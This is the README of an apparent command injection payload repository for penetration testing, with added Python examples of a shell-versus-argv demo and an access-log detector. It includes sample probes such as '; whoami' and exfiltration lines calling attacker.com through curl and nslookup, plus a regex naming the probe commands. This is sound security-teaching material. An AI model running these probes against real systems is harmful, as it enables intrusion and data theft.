A comprehensive collection of command injection payloads for security testing and penetration testing purposes. This repository contains various command injection techniques targeting different operating systems and scenarios.
- Quick Start Guide - Get started in under 5 minutes
- Cheat Sheet - Quick reference for techniques and commands
- Contributing Guidelines - How to contribute to this project
- Project Summary - Complete overview with statistics
Command injection is a security vulnerability that allows an attacker to execute arbitrary commands on the host operating system via a vulnerable application. This repository provides a curated list of payloads organized by technique and platform to assist security professionals in identifying and testing for command injection vulnerabilities.
This repository includes the following payload categories:
- Basic Command Injection: Common command injection patterns using various operators
- Time-Based Command Injection: Payloads for blind command injection detection using time delays
- Encoded Payloads: URL-encoded and obfuscated command injection attempts
- Obfuscated Payloads: Advanced evasion techniques using shell features
- Windows-Specific: Payloads targeting Windows Command Prompt and PowerShell
- Linux/Unix-Specific: Payloads designed for Linux and Unix-based systems
- Data Exfiltration: Commands for extracting sensitive information
- Bypass Techniques: Filter and WAF evasion methods
Clone this repository to your local machine:
```bash
git clone https://github.com/payload-box/command-injection-payload-list.git
cd command-injection-payload-list
```
- Open Burp Suite and navigate to the Intruder tab
- Configure your target and injection point
- Click on "Payloads" tab
- Under "Payload Options", click "Load"
- Select the appropriate payload file from the `Intruder/` directory
- Configure payload processing if needed
- Start the attack
- Open OWASP ZAP and intercept the request
- Right-click on the request and select "Fuzz"
- Highlight the injection point
- Click "Add" under Payloads
- Select "File" as the payload type
- Choose the appropriate payload file from the `Intruder/` directory
- Start the fuzzer
You can manually test command injection vulnerabilities by copying payloads from the files and injecting them into:
- URL parameters
- POST data fields
- HTTP headers
- File upload functionalities
- Cookie values
- API endpoints
| File Name | Description | Payload Count |
|---|---|---|
| `command-injection-basic.txt` | Basic command injection using common operators (`;`, `\|`, …) | |
| `command-injection-time-based.txt` | Time-based blind injection using sleep, ping, and timeout commands | 130 |
| `command-injection-encoded.txt` | URL-encoded and special character encoded payloads | 99 |
| `command-injection-obfuscated.txt` | Obfuscated payloads using shell variables, wildcards, and advanced techniques | 138 |
| `command-injection-windows.txt` | Windows-specific commands including CMD and PowerShell | 179 |
| `command-injection-linux.txt` | Linux/Unix-specific commands and utilities | 220 |
| `command-injection-data-exfiltration.txt` | Payloads for extracting sensitive data | 150 |
| `command-injection-bypass.txt` | Filter evasion and WAF bypass techniques | 202 |
| `command-injection-out-of-band.txt` | Out-of-band data exfiltration and reverse shell payloads | 203 |
| `command-injection-special-chars.txt` | Special characters, edge cases, and delimiter variations | 187 |
| `command-injection-polyglot.txt` | Polyglot payloads and context-breaking techniques | 223 |
- Semicolon (`;`): Executes commands sequentially: `command1; command2`
- Pipe (`|`): Passes output of one command to another: `command1 | command2`
- OR (`||`): Executes second command if first fails: `command1 || command2`
- Ampersand (`&`): Runs command in background: `command1 & command2`
- AND (`&&`): Executes second command only if first succeeds: `command1 && command2`
- Backticks (`` ` ``): Command substitution: `` `command` ``
- Dollar Parentheses (`$()`): Command substitution (POSIX): `$(command)`
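The following added example (not part of the repository) shows how each operator in the list above is interpreted when a string reaches `/bin/sh`, and how the same string stays inert when passed as a single argument without a shell. It assumes a POSIX system with `sh` and `echo`; the inputs and the `INJECTED` marker are constructed and harmless.

```python
import subprocess

MARKER = "INJECTED"  # constructed, harmless marker

# Constructed inputs: one per operator from the list, each trying to run `echo INJECTED`.
SAMPLES = {
    ";":   f"x; echo {MARKER}",
    "|":   f"x | echo {MARKER}",
    "||":  f"x || echo {MARKER}",   # second command runs only if the first fails
    "&":   f"x & echo {MARKER}",
    "&&":  f"x && echo {MARKER}",
    "`":   f"`echo {MARKER}`",
    "$()": f"$(echo {MARKER})",
}

def second_command_ran(stdout):
    # The injected echo ran only if MARKER appears as a line of its own.
    return MARKER in stdout.splitlines()

def via_shell(value):
    # Vulnerable pattern: the whole string is parsed by /bin/sh, operators included.
    out = subprocess.run("echo " + value, shell=True, capture_output=True, text=True)
    return second_command_ran(out.stdout)

def via_argv(value):
    # Hardened pattern: no shell; the value is exactly one argument to echo.
    out = subprocess.run(["echo", value], capture_output=True, text=True)
    return second_command_ran(out.stdout)

def compare():
    # Map each operator to (ran under shell, ran under argv list).
    return {op: (via_shell(v), via_argv(v)) for op, v in SAMPLES.items()}

if __name__ == "__main__":
    for op, (shell, argv) in compare().items():
        print(f"{op:4} shell={shell!s:5} argv={argv}")
```

The `||` case stays `False` under the shell here only because the leading `echo x` succeeds; every operator is inert in the argv form.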
Linux/Unix:
- Uses `/bin/sh`, `/bin/bash`, or other shells
- Sensitive files: `/etc/passwd`, `/etc/shadow`, `/etc/hosts`
- Common commands: `ls`, `cat`, `id`, `whoami`, `uname`

Windows:
- Uses `cmd.exe` or PowerShell
- Sensitive files: `C:\Windows\win.ini`, `C:\Windows\System32\drivers\etc\hosts`
- Common commands: `dir`, `type`, `whoami`, `systeminfo`, `net user`
Look for command output directly in the response:
```
; whoami
| id
```
Measure response time delays:
```
; sleep 10
| ping -c 10 127.0.0.1
```
Trigger external connections:
```
; curl http://attacker.com/?data=$(whoami)
; nslookup $(whoami).attacker.com
```
Analyze error messages for command execution indicators:
```
; cat /nonexistent
| invalid-command
```
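From the defender's side, the probe shapes above leave a recognisable trace in web server logs. The following added example (not part of the repository) scans access-log lines for query parameters that, after URL-decoding, contain one of the listed operators followed by a command used in these probes. The log lines, the log layout and the command list are constructed assumptions, and only query strings are covered, not POST bodies, headers or cookies.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Operators from the page's list, followed by a command its sample probes use.
OPERATOR = r"(?:;|\|\||\||&&|&|`|\$\()"
COMMAND = r"(?:whoami|id|sleep|ping|curl|nslookup|cat)"
PATTERN = re.compile(OPERATOR + r"\s*" + COMMAND + r"\b")
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 "GET /view?file=report.txt HTTP/1.1" 200',
    '10.0.0.9 "GET /view?file=report.txt%3B%20whoami HTTP/1.1" 200',
    '10.0.0.9 "GET /view?file=x%257C%2520id HTTP/1.1" 200',
    '10.0.0.7 "GET /search?q=tom%20%26%20jerry HTTP/1.1" 200',
    '10.0.0.9 "GET /ping?host=127.0.0.1%24%28sleep%2010%29 HTTP/1.1" 200',
]

def fully_decode(value, max_rounds=3):
    """Undo nested URL-encoding, using a bounded number of rounds."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(lines):
    """Return (line_number, parameter, decoded_value) for each suspicious parameter."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qsl performs the first decoding pass; fully_decode handles the rest.
        for name, value in parse_qsl(query, keep_blank_values=True):
            decoded = fully_decode(value)
            if PATTERN.search(decoded):
                hits.append((number, name, decoded))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The double-encoded request on line 3 is caught only because decoding is repeated, and the benign `tom & jerry` search on line 4 is not flagged because no command word follows the operator.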
- Input Validation: Never trust user input; validate and sanitize all data
- Avoid System Calls: Use built-in language features instead of executing system commands
- Parameterization: Use parameterized APIs that separate commands from data
- Whitelist Approach: Only allow specific, expected values
- Principle of Least Privilege: Run applications with minimal necessary permissions
- Escaping: Properly escape special characters if system calls are unavoidable
- Use Safe APIs: Utilize language-specific safe execution methods
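Vulnerable:
```python
import os

filename = request.GET['filename']
os.system('cat ' + filename)  # DANGEROUS! User input is parsed by the shell
```
Secure:
```python
import re
import subprocess

# `request` is the web framework's request object
filename = request.GET['filename']

# Validate filename; fullmatch rejects a trailing newline that `$` would accept
if not re.fullmatch(r'[a-zA-Z0-9_.-]+', filename):
    raise ValueError('Invalid filename')

# Use list-based arguments (no shell); `--` stops a leading "-" being read as an option
subprocess.run(['cat', '--', filename], check=True)
```
- Always obtain proper authorization before testing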
- Test in isolated environments when possible
- Document all findings thoroughly
- Avoid destructive payloads in production systems
- Follow responsible disclosure practices
Contributions are welcome! If you have additional payloads or improvements:
- Fork the repository
- Create a feature branch (`git checkout -b feature/new-payloads`)
- Add your payloads to the appropriate file(s)
- Commit your changes (`git commit -am 'Add new obfuscation techniques'`)
- Push to the branch (`git push origin feature/new-payloads`)
- Create a Pull Request
Please ensure:
- Payloads are tested and functional
- Each payload is on a new line
- Duplicates are avoided
- Documentation is updated accordingly
FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY
This repository is intended for:
- Security researchers
- Penetration testers
- Bug bounty hunters
- Security professionals
- Educational purposes
Important Legal Notice:
- Unauthorized access to computer systems is illegal
- Only test on systems you own or have explicit permission to test
- The contributors and maintainers are not responsible for any misuse
- Users are solely responsible for their actions
- Always comply with local, state, and federal laws
Misuse of this information may result in criminal charges. Use responsibly and ethically.
This project is licensed under the MIT License - see the LICENSE file for details.
- OWASP Testing Guide
- PortSwigger Web Security Academy
- HackTricks
- PayloadsAllTheThings
- Security research community
- QUICK_START.md - Beginner-friendly guide to get started quickly
- CHEAT_SHEET.md - Command injection techniques reference
- CONTRIBUTING.md - Guidelines for contributors
- SUMMARY.md - Project statistics and overview
- GitHub Issues: Report Issues
- Pull Requests: Submit PRs
Stay ethical, stay legal, and happy testing!